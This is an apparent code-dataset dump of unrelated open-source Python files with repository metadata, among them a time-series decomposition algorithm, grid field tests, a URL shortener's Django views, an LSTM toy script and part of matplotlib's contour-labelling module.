for i in range(windowNumber-1):
baseMatrix[:,i] = np.copy(history[i*signatureWindowLength:(i+1)*signatureWindowLength])
U,s,V = mathUtils.computeTruncatedSingularValueDecomposition(baseMatrix,0)
featureMatrix = U.T @ signatureMatrix
params[target] = {'uVec' : U[:,0:fi],
'Feature': featureMatrix}
return params
def getParamNames(self, settings):
"""
Return list of expected variable names based on the parameters
@ In, settings, dict, training parameters for this algorithm
@ Out, names, list, string list of names
"""
names = []
for target in settings['target']:
base = f'{self.name}__{target}'
sw = int(settings['signatureWindowLength'])
fi = int(settings['featureIndex'])
for i in range(fi):
for j in range(sw):
names.append(f'{base}__uVec{i}_{j}')
return names
def getParamsAsVars(self, params):
"""
Map characterization parameters into flattened variable format
@ In, params, dict, trained parameters (as from characterize)
@ Out, rlz, dict, realization-style response
"""
rlz = {}
for target, info in params.items():
base = f'{self.name}__{target}'
(k,l) = (info['uVec']).shape
for i in range(l):
for j in range(k):
rlz[f'{base}__uVec{i}_{j}'] = info['uVec'][j,i]
return rlz
def generate(self, params, pivot, settings):
"""
Generates a synthetic history from fitted parameters.
@ In, params, dict, characterization such as otained from self.characterize()
@ In, pivot, np.array(float), pivot parameter values
@ In, settings, dict, additional settings specific to algorithm
@ Out, synthetic, np.array(float), synthetic estimated model signal
"""
synthetic = np.zeros((len(pivot), len(params)))
for t, (target, _) in enumerate(params.items()):
sigMatSynthetic = params[target]['uVec'] @ params[target]['Feature']
synthetic[:, t] = np.hstack((sigMatSynthetic[0,:-1], sigMatSynthetic[:,-1]))
return synthetic
def writeXML(self, writeTo, params):
"""
Allows the engine to put whatever it wants into an XML to print to file.
@ In, writeTo, xmlUtils.StaticXmlElement, entity to write to
@ In, params, dict, params from as from self.characterize
@ Out, None
"""
counter = 0
for target, info in params.items():
base = xmlUtils.newNode(target)
writeTo.append(base)
(m,n) = info["uVec"].shape
for i in range(n):
U0 = info["uVec"][:,0]
counter +=1
for p, ar in enumerate(U0):
base.append(xmlUtils.newNode(f'uVec{i}_{p}', text=f'{float(ar):1.9e}'))
| 38.178261 | 116 | 0.676916 |
ca29a6e5822ff0c2f2f52dcfb365403314caeb60
| 46 |
py
|
Python
|
end2you/models/multimodal/fusion.py
|
mauricege/end2you
|
0d0c731e210410a1a5b561a747dbea5b0b53639d
|
[
"BSD-3-Clause"
] | null | null | null |
end2you/models/multimodal/fusion.py
|
mauricege/end2you
|
0d0c731e210410a1a5b561a747dbea5b0b53639d
|
[
"BSD-3-Clause"
] | null | null | null |
end2you/models/multimodal/fusion.py
|
mauricege/end2you
|
0d0c731e210410a1a5b561a747dbea5b0b53639d
|
[
"BSD-3-Clause"
] | null | null | null |
# Fusion methods provided to fuse modalities.
| 23 | 45 | 0.804348 |
4bd7df19d8266c5bdd9a94c1f1e6994b17d75f6d
| 756 |
py
|
Python
|
class3/class3_ex1.py
|
ande0581/pynet
|
c02572236383231cb5a1a7b2892ab5e7c94238c7
|
[
"Apache-2.0"
] | null | null | null |
class3/class3_ex1.py
|
ande0581/pynet
|
c02572236383231cb5a1a7b2892ab5e7c94238c7
|
[
"Apache-2.0"
] | null | null | null |
class3/class3_ex1.py
|
ande0581/pynet
|
c02572236383231cb5a1a7b2892ab5e7c94238c7
|
[
"Apache-2.0"
] | null | null | null |
# SNMPwalk on Windows
# SnmpWalk.exe -r:10.40.0.1 -t:10 -c:"private" -os:1.3.6.1.2.1.2.2.1 -op:1.3.6.1.2.1.2.2.1.20
import snmp_helper
ip = '10.40.0.1'
a_user = 'mysnmpuser'
auth_key = 'myauthkey'
encrypt_key = 'myencryptkey'
snmp_user = (a_user, auth_key, encrypt_key)
my_router = (ip, 161)
systemName = '1.3.6.1.2.1.1.5.0'
ccmHistoryRunningLastChanged = '1.3.6.1.4.1.9.9.43.1.1.1.0'
ccmHistoryRunningLastSaved = '1.3.6.1.4.1.9.9.43.1.1.2.0'
ccmHistoryStartupLastChanged = '1.3.6.1.4.1.9.9.43.1.1.3.0'
sysUptime = '1.3.6.1.2.1.1.3.0'
oid = ccmHistoryStartupLastChanged
snmp_data = snmp_helper.snmp_get_oid_v3(my_router, snmp_user, oid=oid)
output = snmp_helper.snmp_extract(snmp_data)
print output
if __name__ == '__main__':
print "hello world"
| 28 | 93 | 0.703704 |
076cdf162d8ce46f2d17a43b464cfb52165b96b8
| 3,643 |
py
|
Python
|
pardet/models/par_detectors/strongbaseline.py
|
wduo/pardet-pytorch
|
9df9124b013728d9de4d7948d1e5a6f535c9d7e7
|
[
"Apache-2.0"
] | 7 |
2020-12-06T11:14:58.000Z
|
2021-03-28T08:48:07.000Z
|
pardet/models/par_detectors/strongbaseline.py
|
wduo/pardet-pytorch
|
9df9124b013728d9de4d7948d1e5a6f535c9d7e7
|
[
"Apache-2.0"
] | null | null | null |
pardet/models/par_detectors/strongbaseline.py
|
wduo/pardet-pytorch
|
9df9124b013728d9de4d7948d1e5a6f535c9d7e7
|
[
"Apache-2.0"
] | 3 |
2020-12-06T14:24:24.000Z
|
2021-11-25T09:57:53.000Z
|
from collections import OrderedDict
import torch
import torch.nn as nn
from ..builder import CLASSIFIERS, PARNETS, build_bockbone, build_classifier, build_loss
@CLASSIFIERS.register_module()
class BaseClassifier(nn.Module):
def __init__(self, nattr):
super().__init__()
self.logits = nn.Sequential(
nn.Linear(2048, nattr),
nn.BatchNorm1d(nattr)
)
self.avg_pool = nn.AdaptiveAvgPool2d(1)
def fresh_params(self):
return self.parameters()
def forward(self, feature):
feat = self.avg_pool(feature).view(feature.size(0), -1)
x = self.logits(feat)
return x
@PARNETS.register_module()
class StrongBaseline(nn.Module):
def __init__(self, backbone, classifier, loss):
super(StrongBaseline, self).__init__()
self.backbone = build_bockbone(backbone)
self.classifier = build_classifier(classifier)
self.loss = build_loss(loss)
def fresh_params(self):
params = self.classifier.fresh_params()
return params
def finetune_params(self):
return self.backbone.parameters()
def extract_feat(self, img):
x = self.backbone(img)
return x
def forward_train(self, **kwargs):
feat_map = self.extract_feat(kwargs['img'].cuda())
logits = self.classifier(feat_map)
losses = dict()
loss = self.loss(logits, kwargs['gt_label'].cuda(), kwargs['weights'])
losses.update(loss)
return losses
def forward(self, return_loss=True, **kwargs):
if return_loss:
return self.forward_train(**kwargs)
else:
return self.forward_test(**kwargs)
def train_step(self, data, optimizer, **kwargs):
losses = self(**data, **kwargs)
loss, log_vars = self._parse_losses(losses)
outputs = dict(
loss=loss, log_vars=log_vars, num_samples=len(data['img_name']))
return outputs
def val_step(self, data, optimizer, **kwargs):
losses = self(**data, **kwargs)
loss, log_vars = self._parse_losses(losses)
outputs = dict(
loss=loss, log_vars=log_vars, num_samples=len(data['img_name']))
return outputs
def _parse_losses(self, losses):
log_vars = OrderedDict()
for loss_name, loss_value in losses.items():
if isinstance(loss_value, torch.Tensor):
log_vars[loss_name] = loss_value.mean()
elif isinstance(loss_value, list):
log_vars[loss_name] = sum(_loss.mean() for _loss in loss_value)
else:
raise TypeError(f'{loss_name} is not a tensor or list of tensors')
loss = sum(_value for _key, _value in log_vars.items() if 'loss' in _key)
log_vars['loss'] = loss
for loss_name, loss_value in log_vars.items():
log_vars[loss_name] = loss_value.item()
return loss, log_vars
def forward_test(self, **kwargs):
imgs = kwargs.pop('img')
num_augs = len(imgs)
if num_augs == 1:
return self.simple_test(imgs, **kwargs)
else:
return self.aug_test(imgs, **kwargs)
def simple_test(self, img, **kwargs):
feat_map = self.extract_feat(img.cuda())
logit = self.classifier(feat_map)
prob = torch.sigmoid(logit).detach().cpu().numpy()
gt_label = kwargs['gt_label'].detach().cpu().numpy()
result = dict(prob=prob, gt_label=gt_label)
return result
def aug_test(self, imgs, **kwargs):
# TODO: support test augmentation for predefined proposals
pass
| 31.136752 | 88 | 0.620093 |
8dc8ff1eaefdaf985e54b1927b1af3abe23572e7
| 2,168 |
py
|
Python
|
landlab/grid/tests/test_raster_grid/test_fields.py
|
laijingtao/landlab
|
871151bff814e672b4f09f091b6347367758c764
|
[
"MIT"
] | 1 |
2015-08-17T19:29:50.000Z
|
2015-08-17T19:29:50.000Z
|
landlab/grid/tests/test_raster_grid/test_fields.py
|
laijingtao/landlab
|
871151bff814e672b4f09f091b6347367758c764
|
[
"MIT"
] | null | null | null |
landlab/grid/tests/test_raster_grid/test_fields.py
|
laijingtao/landlab
|
871151bff814e672b4f09f091b6347367758c764
|
[
"MIT"
] | 2 |
2017-07-03T20:21:13.000Z
|
2018-09-06T23:58:19.000Z
|
import numpy as np
from numpy.testing import assert_array_equal
from nose.tools import assert_raises
from landlab import RasterModelGrid
def test_add_field_at_node():
"""Add field at nodes."""
grid = RasterModelGrid((4, 5))
grid.add_field('z', np.arange(20), at='node')
assert_array_equal(grid.at_node['z'], np.arange(20))
def test_add_field_without_at_keyword():
"""Test default is at nodes."""
grid = RasterModelGrid((4, 5))
grid.add_field('z', np.arange(20))
assert_array_equal(grid.at_node['z'], np.arange(20))
def test_add_field_without_at():
"""Test raises error with wrong size array."""
grid = RasterModelGrid((4, 5))
assert_raises(ValueError, grid.add_field, 'z', np.arange(21))
def test_add_field_at_grid_value_error():
"""Test raises error with wrong size array for adding a at_grid field both possible ways."""
grid = RasterModelGrid((4, 5))
assert_raises(ValueError, grid.add_field, 'value', [0,1], at='grid')
with assert_raises(ValueError):
grid.at_grid['new_value']=[2,4]
def test_add_field_at_grid():
"""Test add field at grid."""
grid = RasterModelGrid((4, 5))
grid.at_grid['value']=1
assert_array_equal(1, grid.at_grid['value'].size)
def test_adding_field_at_grid_two_ways():
"""Test add field at grid two ways."""
grid = RasterModelGrid((4, 5))
grid.at_grid['value_1']=1
grid.add_field('value_2', 1, at='grid')
assert_array_equal(grid.at_grid['value_1'], grid.at_grid['value_2'])
def test_add_ones_zeros_empty_to_at_grid():
"""Test different add methods for keyword at='grid'"""
grid = RasterModelGrid((4, 5))
assert_raises(ValueError, grid.add_zeros, 'value', at='grid')
assert_raises(ValueError, grid.add_empty, 'value', at='grid')
assert_raises(ValueError, grid.add_ones, 'value', at='grid')
def test_ones_zeros_empty_to_at_grid():
"""Test get array with field size methods for keyword at='grid'"""
grid = RasterModelGrid((4, 5))
assert_raises(ValueError, grid.zeros, at='grid')
assert_raises(ValueError, grid.empty, at='grid')
assert_raises(ValueError, grid.ones, at='grid')
| 34.967742 | 96 | 0.694649 |
f6624017b71f6f71b3d4fd4f1d2649cdd1378df3
| 1,488 |
py
|
Python
|
Day 11/part1.py
|
MrHarcombe/advent2015
|
b14b858eef369ed2df230a7c5ebc702eed7ef524
|
[
"CC0-1.0"
] | null | null | null |
Day 11/part1.py
|
MrHarcombe/advent2015
|
b14b858eef369ed2df230a7c5ebc702eed7ef524
|
[
"CC0-1.0"
] | null | null | null |
Day 11/part1.py
|
MrHarcombe/advent2015
|
b14b858eef369ed2df230a7c5ebc702eed7ef524
|
[
"CC0-1.0"
] | null | null | null |
import re
password = "abcdefgh"
password = "ghijklmn"
password = "vzbxkghb" # part 1 input
password = "vzbxxyzz" # part 2 input
#sequence = re.compile(r'(?:a(?=b)|b(?=c)|c(?=d)|d(?=e)|e(?=f)|f(?=g)|g(?=h)|h(?=i)|i(?=j)|j(?=k)|k(?=l)|l(?=m)|m(?=n)|n(?=o)|o(?=p)|p(?=q)|q(?=r)|r(?=s)|s(?=t)|t(?=u)|u(?=v)|v(?=w)|w(?=x)|x(?=y)|y(?=z)){3,}')
pairs = re.compile(r'([a-z])\1.*([a-z])\2')
def is_legal(potential):
if True in [c in potential for c in 'iol']:
#print(potential,"contains iol")
return False
#smatches = sequence.search(potential)
#if smatches == None:
#print(potential,"contains no sequence")
#return False
sequence = False
for p in range(len(potential)-2):
if ord(potential[p]) == ord(potential[p+1]) - 1 and ord(potential[p]) == ord(potential[p+2]) - 2:
sequence = True
if not sequence:
#print(potential,"contains no sequence")
return False
pmatches = pairs.search(potential)
if pmatches == None:
#print(potential,"contains no pairs")
return False
return True
def inc_password(value):
value = value[::-1]
keep_going = True
column = 0
while keep_going:
value = value[0:column] + chr(((ord(value[column]) - 97 + 1) % 26) + 97) + value[column+1:]
if value[column] != 'a':
keep_going = False
else:
column += 1
return value[::-1]
password = inc_password(password)
while not is_legal(password):
#print(password,"-> illegal")
password = inc_password(password)
print(password)
| 27.054545 | 209 | 0.603495 |
df27071f0bf39237294199481c51c72aa646ad28
| 782 |
py
|
Python
|
onfido/resources/applicants.py
|
daaain/onfido-python
|
62675c97cf7d03de2ab3ed4b07ec0bde9e2b1a5d
|
[
"MIT"
] | null | null | null |
onfido/resources/applicants.py
|
daaain/onfido-python
|
62675c97cf7d03de2ab3ed4b07ec0bde9e2b1a5d
|
[
"MIT"
] | null | null | null |
onfido/resources/applicants.py
|
daaain/onfido-python
|
62675c97cf7d03de2ab3ed4b07ec0bde9e2b1a5d
|
[
"MIT"
] | null | null | null |
from ..resource import Resource
class Applicants(Resource):
def create(self, request_body:dict):
return self.post("applicants/", **request_body)
def update(self, applicant_id:str, request_body:dict):
return self.put(f"applicants/{applicant_id}", request_body)
def find(self, applicant_id:str):
return self.get(f"applicants/{applicant_id}")
def delete(self, applicant_id:str):
self.delete_request(f"applicants/{applicant_id}")
def all(self, **user_payload:dict):
payload = {"include_deleted": False, "per_page": 20, "page": 1}
payload.update(user_payload)
return self.get("applicants", payload=payload)
def restore(self, applicant_id:str):
self.post(f"applicants/{applicant_id}/restore")
| 32.583333 | 71 | 0.682864 |
9e76fec151908142195eb38f84582544eeddb7bd
| 3,806 |
py
|
Python
|
test/perc.py
|
kariminf/MultiNetSum
|
b3a66d13049d4501c7e07243af45e8c56512d624
|
[
"Apache-2.0"
] | 1 |
2019-02-24T22:15:44.000Z
|
2019-02-24T22:15:44.000Z
|
test/perc.py
|
kariminf/MultiNetSum
|
b3a66d13049d4501c7e07243af45e8c56512d624
|
[
"Apache-2.0"
] | 6 |
2018-07-24T13:52:45.000Z
|
2019-08-23T22:10:16.000Z
|
test/perc.py
|
kariminf/MultiNetSum
|
b3a66d13049d4501c7e07243af45e8c56512d624
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2018 Abdelkrime Aries <[email protected]>
#
# ---- AUTHORS ----
# 2018 Abdelkrime Aries <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#just a code to learn how to sum a vector then divide it on the sum of another
#victor, then multiply by a scalar
import tensorflow as tf
import numpy as np
DATA = [
[[15, 20], [15, 20, 30], 0.5],
[[10, 12], [15, 12, 12, 10], .3],
[[10, 12], [15, 12, 12, 10], .2],
[[2, 12, 13], [20, 13, 2, 12, 25], .1],
[[5], [5, 13, 12, 25], .7]
]
X = [
[[15.0], [20.0], [0.0]],
[[10.0], [12.0], [0.0]],
[[10.0], [12.0], [0.0]],
[[2.0], [12.0], [13.0]],
[[5.0], [0.0], [0.0]]
]
X__ = [
[[0.0], [15.0], [20.0]],
[[0.0], [10.0], [12.0]],
[[0.0], [10.0], [12.0]],
[[2.0], [12.0], [13.0]],
[[0.0], [0.0], [5.0]]
]
Y = [
[[15.0], [20.0], [30.0], [0.0], [0.0]],
[[15.0], [12.0], [12.0], [10.0], [0.0]],
[[15.0], [12.0], [12.0], [10.0], [0.0]],
[[20.0], [13.0], [2.0], [12.0], [25.0]],
[[5.0], [13.0], [12.0], [25.0], [0.0]]
]
Y__ = [
[[0.0], [0.0], [15.0], [20.0], [30.0]],
[[0.0], [15.0], [12.0], [12.0], [10.0]],
[[0.0], [15.0], [12.0], [12.0], [10.0]],
[[20.0], [13.0], [2.0], [12.0], [25.0]],
[[0.0], [5.0], [13.0], [12.0], [25.0]]
]
Z = [
[0.5],
[0.3],
[0.2],
[0.1],
[0.7]
]
RESULT = [
[0.2692307692],
[0.1346938776],
[0.0897959184],
[0.0375],
[0.0636363636]
]
LEARNING_RATE = 0.05
def get_output(net):
batch_size = tf.shape(net)[0]
max_length = tf.shape(net)[1]
out_size = int(net.get_shape()[2])
index = tf.range(0, batch_size) * max_length
flat = tf.reshape(net, [-1, out_size])
return tf.gather(flat, index)
if __name__ == '__main__':
##############################################################################
x_ = tf.placeholder(tf.float32, shape=[None,None,1], name="x-input")
y_ = tf.placeholder(tf.float32, shape=[None,None,1], name="y-input")
z_ = tf.placeholder(tf.float32, shape=[None,1], name="z-input")
r_ = tf.placeholder(tf.float32, shape=[None ,1], name="result")
with tf.variable_scope("lstm1"):
sumXCell = tf.contrib.rnn.LSTMCell(2,num_proj=2)
outX,_ = tf.nn.dynamic_rnn(sumXCell,x_,dtype=tf.float32) #shape: (None, 12, 2)
with tf.variable_scope("lstm2"):
sumYCell = tf.contrib.rnn.LSTMCell(2, num_proj=2)
outY,_ = tf.nn.dynamic_rnn(sumYCell,y_,dtype=tf.float32) #shape: (None, 12, 2)
predXS = tf.reduce_sum(outX)
outXY = tf.concat((get_output(outX), get_output(outY), z_), axis=1)
output = tf.layers.dense(outXY, units=10, activation=tf.nn.tanh)
output = tf.layers.dense(output, units=1, activation=tf.nn.tanh)
cost = tf.losses.mean_squared_error(r_, output)
train_step = tf.train.GradientDescentOptimizer(LEARNING_RATE).minimize(cost)
init = tf.global_variables_initializer()
sess = tf.Session()
sess.run(init)
#saver = tf.train.Saver()
for i in range(10000):
_, cst, px = sess.run([train_step, cost, predXS], feed_dict={x_: X, y_: Y, z_: Z , r_: RESULT})
print i, cst, px
#sess.run(train_step, feed_dict={x_: X, y_: Y, z_: Z, r_: RESULT})
#saver.save(sess, "./aak.ckpt")
tX = [[[10.0], [5.0]]]
tY = [[[10.0], [5.0], [15.0], [8.0]]]
tZ = [[0.8]]
tRES = [[0.3157894737]]
print("Predicted: ", sess.run(output,feed_dict={x_: tX, y_: tY, z_: tZ}), " Expected: ", tRES)
| 26.802817 | 97 | 0.582764 |
6f9559d27dc3428c0f2e5d230a21306727376bca
| 745 |
py
|
Python
|
ai_chan/util.py
|
kagyuu/ai-chan
|
1fa5c803ca9fefb1ccf6c9195c8f8015da56bda1
|
[
"MIT"
] | null | null | null |
ai_chan/util.py
|
kagyuu/ai-chan
|
1fa5c803ca9fefb1ccf6c9195c8f8015da56bda1
|
[
"MIT"
] | null | null | null |
ai_chan/util.py
|
kagyuu/ai-chan
|
1fa5c803ca9fefb1ccf6c9195c8f8015da56bda1
|
[
"MIT"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
def debug(msg, *args):
print(msg.format(*args))
def least_square_average(d, y):
"""
自乗誤差平均を求めます
:param d:教師データ(expected)
:param y:予想(actual)
:return: 自乗誤差平均
"""
return (np.sum(np.square(d - y)) / 2.0) / float(len(d))
def draw_hist(m, label, bins=50, min_max=(-10.0, 10.0)):
"""
行列のリストを展開して、matplotlib の histogram を作ります
:param m: 行列のリスト
:param label: データの名称
:param bins: 区切り数(デフォルト50). Noneを指定すると自動
:param min_max: データの幅(デフォルト-10~10). Noneを指定すると自動
:return:
"""
flat = []
for idx in range(1, len(m)):
flat.extend(m[idx].flatten().tolist())
plt.hist(flat, label=label, bins=bins, range=min_max, alpha=0.5)
| 23.28125 | 68 | 0.620134 |
3f56f1de768b233583ce4c485e721211d46ae025
| 1,412 |
py
|
Python
|
url_shortener/views.py
|
teremterem/django_url_shortener
|
2da496a9e8287e6291d47227b72e92ee05d4f0b1
|
[
"MIT"
] | 2 |
2020-09-01T19:05:23.000Z
|
2020-09-02T13:14:32.000Z
|
url_shortener/views.py
|
teremterem/django_url_shortener
|
2da496a9e8287e6291d47227b72e92ee05d4f0b1
|
[
"MIT"
] | 15 |
2020-09-02T00:30:38.000Z
|
2020-09-19T10:06:19.000Z
|
url_shortener/views.py
|
teremterem/django_url_shortener
|
2da496a9e8287e6291d47227b72e92ee05d4f0b1
|
[
"MIT"
] | null | null | null |
import logging
from django.conf import settings
from django.http import HttpResponseRedirect, Http404
from django.shortcuts import render, redirect
from url_shortener.shortener import shortener_storage, shortener_utils
log = logging.getLogger(__name__)
def index(request):
last_short_url = request.session.pop('LAST_URL_HANDLE', '')
if last_short_url:
last_short_url = settings.DJANGO_URL_SHORTENER_PREFIX + last_short_url
return render(request, 'url_shortener/index.html', context={
'last_short_url': last_short_url,
})
def shorten_url(request):
long_url = request.POST['long_url'].strip()
if long_url:
long_url = shortener_utils.normalize_long_url(long_url)
url_handle = shortener_storage.shorten_url(long_url)
request.session['LAST_URL_HANDLE'] = url_handle
return redirect('index', permanent=False)
def expand_url(request, url_handle):
try:
long_url = shortener_storage.expand_url(url_handle)
if long_url:
return HttpResponseRedirect(long_url)
except Exception:
# log exception with level debug to avoid log cluttering in hypothetical production - it is easy to provoke
# exceptions here by deliberately sending malformed url handles from the client
log.debug('Failed to resolve short URL with handle %s', url_handle, exc_info=True)
raise Http404('URL not found')
| 32.837209 | 115 | 0.73796 |
0ab6f6687f2ca137dfb5899725d27acccb505b3e
| 42,063 |
py
|
Python
|
lib/matplotlib/contour.py
|
mattfoster/matplotlib
|
0b47697b19b77226c633ec6a3d74a2199a153315
|
[
"PSF-2.0",
"BSD-3-Clause"
] | 1 |
2016-05-08T18:33:12.000Z
|
2016-05-08T18:33:12.000Z
|
lib/matplotlib/contour.py
|
mattfoster/matplotlib
|
0b47697b19b77226c633ec6a3d74a2199a153315
|
[
"PSF-2.0",
"BSD-3-Clause"
] | null | null | null |
lib/matplotlib/contour.py
|
mattfoster/matplotlib
|
0b47697b19b77226c633ec6a3d74a2199a153315
|
[
"PSF-2.0",
"BSD-3-Clause"
] | null | null | null |
"""
These are classes to support contour plotting and
labelling for the axes class
"""
from __future__ import division
import warnings
import matplotlib as mpl
import numpy as np
from numpy import ma
import matplotlib._cntr as _cntr
import matplotlib.path as path
import matplotlib.ticker as ticker
import matplotlib.cm as cm
import matplotlib.colors as colors
import matplotlib.collections as collections
import matplotlib.font_manager as font_manager
import matplotlib.text as text
import matplotlib.cbook as cbook
import matplotlib.mlab as mlab
# Import needed for adding manual selection capability to clabel
from matplotlib.blocking_input import BlockingContourLabeler
# We can't use a single line collection for contour because a line
# collection can have only a single line style, and we want to be able to have
# dashed negative contours, for example, and solid positive contours.
# We could use a single polygon collection for filled contours, but it
# seems better to keep line and filled contours similar, with one collection
# per level.
class ContourLabeler:
'''Mixin to provide labelling capability to ContourSet'''
def clabel(self, *args, **kwargs):
"""
call signature::
clabel(cs, **kwargs)
adds labels to line contours in *cs*, where *cs* is a
:class:`~matplotlib.contour.ContourSet` object returned by
contour.
::
clabel(cs, v, **kwargs)
only labels contours listed in *v*.
Optional keyword arguments:
*fontsize*:
See http://matplotlib.sf.net/fonts.html
*colors*:
- if *None*, the color of each label matches the color of
the corresponding contour
- if one string color, e.g. *colors* = 'r' or *colors* =
'red', all labels will be plotted in this color
- if a tuple of matplotlib color args (string, float, rgb, etc),
different labels will be plotted in different colors in the order
specified
*inline*:
controls whether the underlying contour is removed or
not. Default is *True*.
*inline_spacing*:
space in pixels to leave on each side of label when
placing inline. Defaults to 5. This spacing will be
exact for labels at locations where the contour is
straight, less so for labels on curved contours.
*fmt*:
a format string for the label. Default is '%1.3f'
Alternatively, this can be a dictionary matching contour
levels with arbitrary strings to use for each contour level
(i.e., fmt[level]=string)
*manual*:
if *True*, contour labels will be placed manually using
mouse clicks. Click the first button near a contour to
add a label, click the second button (or potentially both
mouse buttons at once) to finish adding labels. The third
button can be used to remove the last label added, but
only if labels are not inline. Alternatively, the keyboard
can be used to select label locations (enter to end label
placement, delete or backspace act like the third mouse button,
and any other key will select a label location).
.. plot:: mpl_examples/pylab_examples/contour_demo.py
"""
"""
NOTES on how this all works:
clabel basically takes the input arguments and uses them to
add a list of "label specific" attributes to the ContourSet
object. These attributes are all of the form label* and names
should be fairly self explanatory.
Once these attributes are set, clabel passes control to the
labels method (case of automatic label placement) or
BlockingContourLabeler (case of manual label placement).
"""
fontsize = kwargs.get('fontsize', None)
inline = kwargs.get('inline', 1)
inline_spacing = kwargs.get('inline_spacing', 5)
self.labelFmt = kwargs.get('fmt', '%1.3f')
_colors = kwargs.get('colors', None)
# Detect if manual selection is desired and remove from argument list
self.labelManual=kwargs.get('manual',False)
if len(args) == 0:
levels = self.levels
indices = range(len(self.levels))
elif len(args) == 1:
levlabs = list(args[0])
indices, levels = [], []
for i, lev in enumerate(self.levels):
if lev in levlabs:
indices.append(i)
levels.append(lev)
if len(levels) < len(levlabs):
msg = "Specified levels " + str(levlabs)
msg += "\n don't match available levels "
msg += str(self.levels)
raise ValueError(msg)
else:
raise TypeError("Illegal arguments to clabel, see help(clabel)")
self.labelLevelList = levels
self.labelIndiceList = indices
self.labelFontProps = font_manager.FontProperties()
if fontsize == None:
font_size = int(self.labelFontProps.get_size_in_points())
else:
if type(fontsize) not in [int, float, str]:
raise TypeError("Font size must be an integer number.")
# Can't it be floating point, as indicated in line above?
else:
if type(fontsize) == str:
font_size = int(self.labelFontProps.get_size_in_points())
else:
self.labelFontProps.set_size(fontsize)
font_size = fontsize
self.labelFontSizeList = [font_size] * len(levels)
if _colors == None:
self.labelMappable = self
self.labelCValueList = np.take(self.cvalues, self.labelIndiceList)
else:
cmap = colors.ListedColormap(_colors, N=len(self.labelLevelList))
self.labelCValueList = range(len(self.labelLevelList))
self.labelMappable = cm.ScalarMappable(cmap = cmap,
norm = colors.NoNorm())
#self.labelTexts = [] # Initialized in ContourSet.__init__
#self.labelCValues = [] # same
self.labelXYs = []
if self.labelManual:
print 'Select label locations manually using first mouse button.'
print 'End manual selection with second mouse button.'
if not inline:
print 'Remove last label by clicking third mouse button.'
blocking_contour_labeler = BlockingContourLabeler(self)
blocking_contour_labeler(inline,inline_spacing)
else:
self.labels(inline,inline_spacing)
# Hold on to some old attribute names. These are depricated and will
# be removed in the near future (sometime after 2008-08-01), but keeping
# for now for backwards compatibility
self.cl = self.labelTexts
self.cl_xy = self.labelXYs
self.cl_cvalues = self.labelCValues
self.labelTextsList = cbook.silent_list('text.Text', self.labelTexts)
return self.labelTextsList
def print_label(self, linecontour,labelwidth):
"if contours are too short, don't plot a label"
lcsize = len(linecontour)
if lcsize > 10 * labelwidth:
return 1
xmax = np.amax(linecontour[:,0])
xmin = np.amin(linecontour[:,0])
ymax = np.amax(linecontour[:,1])
ymin = np.amin(linecontour[:,1])
lw = labelwidth
if (xmax - xmin) > 1.2* lw or (ymax - ymin) > 1.2 * lw:
return 1
else:
return 0
def too_close(self, x,y, lw):
"if there's a label already nearby, find a better place"
if self.labelXYs != []:
dist = [np.sqrt((x-loc[0]) ** 2 + (y-loc[1]) ** 2)
for loc in self.labelXYs]
for d in dist:
if d < 1.2*lw:
return 1
else: return 0
else: return 0
def get_label_coords(self, distances, XX, YY, ysize, lw):
""" labels are ploted at a location with the smallest
dispersion of the contour from a straight line
unless there's another label nearby, in which case
the second best place on the contour is picked up
if there's no good place a label isplotted at the
beginning of the contour
"""
hysize = int(ysize/2)
adist = np.argsort(distances)
for ind in adist:
x, y = XX[ind][hysize], YY[ind][hysize]
if self.too_close(x,y, lw):
continue
else:
return x,y, ind
ind = adist[0]
x, y = XX[ind][hysize], YY[ind][hysize]
return x,y, ind
def get_label_width(self, lev, fmt, fsize):
"get the width of the label in points"
if cbook.is_string_like(lev):
lw = (len(lev)) * fsize
else:
lw = (len(self.get_text(lev,fmt))) * fsize
return lw
def get_real_label_width( self, lev, fmt, fsize ):
"""
This computes actual onscreen label width.
This uses some black magic to determine onscreen extent of non-drawn
label. This magic may not be very robust.
"""
# Find middle of axes
xx = np.mean( np.asarray(self.ax.axis()).reshape(2,2), axis=1 )
# Temporarily create text object
t = text.Text( xx[0], xx[1] )
self.set_label_props( t, self.get_text(lev,fmt), 'k' )
# Some black magic to get onscreen extent
# NOTE: This will only work for already drawn figures, as the canvas
# does not have a renderer otherwise. This is the reason this function
# can't be integrated into the rest of the code.
bbox = t.get_window_extent(renderer=self.ax.figure.canvas.renderer)
# difference in pixel extent of image
lw = np.diff(bbox.corners()[0::2,0])[0]
return lw
def set_label_props(self, label, text, color):
"set the label properties - color, fontsize, text"
label.set_text(text)
label.set_color(color)
label.set_fontproperties(self.labelFontProps)
label.set_clip_box(self.ax.bbox)
def get_text(self, lev, fmt):
"get the text of the label"
if cbook.is_string_like(lev):
return lev
else:
if isinstance(fmt,dict):
return fmt[lev]
else:
return fmt%lev
def locate_label(self, linecontour, labelwidth):
"""find a good place to plot a label (relatively flat
part of the contour) and the angle of rotation for the
text object
"""
nsize= len(linecontour)
if labelwidth > 1:
xsize = int(np.ceil(nsize/labelwidth))
else:
xsize = 1
if xsize == 1:
ysize = nsize
else:
ysize = labelwidth
XX = np.resize(linecontour[:,0],(xsize, ysize))
YY = np.resize(linecontour[:,1],(xsize, ysize))
#I might have fouled up the following:
yfirst = YY[:,0].reshape(xsize, 1)
ylast = YY[:,-1].reshape(xsize, 1)
xfirst = XX[:,0].reshape(xsize, 1)
xlast = XX[:,-1].reshape(xsize, 1)
s = (yfirst-YY) * (xlast-xfirst) - (xfirst-XX) * (ylast-yfirst)
L = np.sqrt((xlast-xfirst)**2+(ylast-yfirst)**2).ravel()
dist = np.add.reduce(([(abs(s)[i]/L[i]) for i in range(xsize)]),-1)
x,y,ind = self.get_label_coords(dist, XX, YY, ysize, labelwidth)
#print 'ind, x, y', ind, x, y
# There must be a more efficient way...
lc = [tuple(l) for l in linecontour]
dind = lc.index((x,y))
#print 'dind', dind
#dind = list(linecontour).index((x,y))
return x, y, dind
